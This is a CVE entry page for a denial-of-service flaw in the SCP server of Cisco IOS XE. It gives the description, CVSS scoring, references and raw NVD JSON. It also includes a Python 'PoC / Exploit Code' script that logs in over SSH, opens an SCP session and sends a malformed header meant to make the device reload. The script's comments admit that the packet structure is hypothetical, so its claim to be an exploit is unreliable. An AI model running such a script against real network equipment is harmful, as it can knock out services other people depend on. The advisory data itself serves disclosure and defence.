CVE-2026-20083

Description

A vulnerability in the Secure Copy Protocol (SCP) server feature of Cisco IOS XE Software could allow an authenticated, local attacker with low privileges to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of a malformed SCP request. An attacker could exploit this vulnerability by issuing a crafted command through SSH. A successful exploit could allow the attacker to cause the device to reload unexpectedly, resulting in a DoS condition.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Cisco IOS XE Software (具体受影响版本请参考Cisco官方安全公告cisco-sa-scp-dos-duAdXtCg)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Conceptual PoC for CVE-2026-20083
# Requires: pip install paramiko

import paramiko
import time

def exploit_cve(target_ip, username, password):
    try:
        # 1. Establish SSH connection
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(target_ip, username=username, password=password)
        
        # 2. Send malformed SCP request
        # The specific malformed packet structure is hypothetical based on the description
        # 'crafted command through SSH'
        transport = client.get_transport()
        channel = transport.open_session()
        channel.exec_command('scp -t /malformed/path')
        
        # 3. Send payload causing DoS (Example malformed header)
        # Sending unexpected bytes to trigger parsing error
        malformed_payload = b'C0000\x00\x00\x00' 
        channel.send(malformed_payload)
        
        print("[+] Malformed payload sent. Triggering DoS...")
        time.sleep(2)
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        client.close()

if __name__ == "__main__":
    exploit_cve("192.168.1.1", "low_priv_user", "password")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-20083
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-20083
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-20083/
[4] VulDB https://vuldb.com/cve/CVE-2026-20083
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-scp-dos-duAdXtCg

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-20083", "sourceIdentifier": "[email protected]", "published": "2026-03-25T16:16:12.903", "lastModified": "2026-03-26T15:13:33.940", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Secure Copy Protocol (SCP) server feature of Cisco IOS XE Software could allow an authenticated, local attacker with low privileges to cause a denial of service (DoS) condition on an affected device.\r\n\r This vulnerability is due to improper handling of a malformed SCP request. An attacker could exploit this vulnerability by issuing a crafted command through SSH. A successful exploit could allow the attacker to cause the device to reload unexpectedly, resulting in a DoS condition."}, {"lang": "es", "value": "Una vulnerabilidad en la característica de servidor del Secure Copy Protocol (SCP) de Cisco IOS XE Software podría permitir a un atacante local autenticado con bajos privilegios causar una condición de denegación de servicio (DoS) en un dispositivo afectado. Esta vulnerabilidad se debe a un manejo inadecuado de una solicitud SCP malformada. Un atacante podría explotar esta vulnerabilidad emitiendo un comando manipulado a través de SSH. Un exploit exitoso podría permitir al atacante causar que el dispositivo se recargue inesperadamente, lo que resultaría en una condición de DoS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-235"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-scp-dos-duAdXtCg", "source": "[email protected]"}]}}